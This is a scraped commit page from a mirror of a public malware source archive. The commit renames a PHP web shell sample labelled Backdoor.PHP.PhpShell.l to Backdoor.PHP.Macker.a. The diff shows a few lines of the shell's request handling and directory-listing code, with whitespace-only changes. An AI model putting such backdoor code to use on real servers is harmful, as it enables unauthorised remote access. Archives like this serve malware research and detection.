mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-20 17:18:52 +00:00
Rename Backdoor.PHP.PhpShell.l to Backdoor.PHP.Macker.a
This commit is contained in:
parent
4c232d478c
commit
687be7ffe4
@ -54,11 +54,13 @@ if (isset($_PUT)) walkArray($_PUT);
|
|||||||
if (isset($_GET)) walkArray($_GET);
|
if (isset($_GET)) walkArray($_GET);
|
||||||
if (isset($_POST)) walkArray($_POST);
|
if (isset($_POST)) walkArray($_POST);
|
||||||
|
|
||||||
$pos = strpos($urlAdd, "s=r");
|
|
||||||
|
$pos = strpos($urlAdd, "s=r");
|
||||||
if (strval($pos) != "") {
|
if (strval($pos) != "") {
|
||||||
$urlAdd= substr($urlAdd, 0, $pos);
|
$urlAdd= substr($urlAdd, 0, $pos);
|
||||||
}
|
}
|
||||||
$urlAdd .= "&s=r&";
|
|
||||||
|
$urlAdd .= "&s=r&";
|
||||||
|
|
||||||
if (empty($Pmax))
|
if (empty($Pmax))
|
||||||
$Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
|
$Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
|
Loading…
Reference in New Issue
Block a user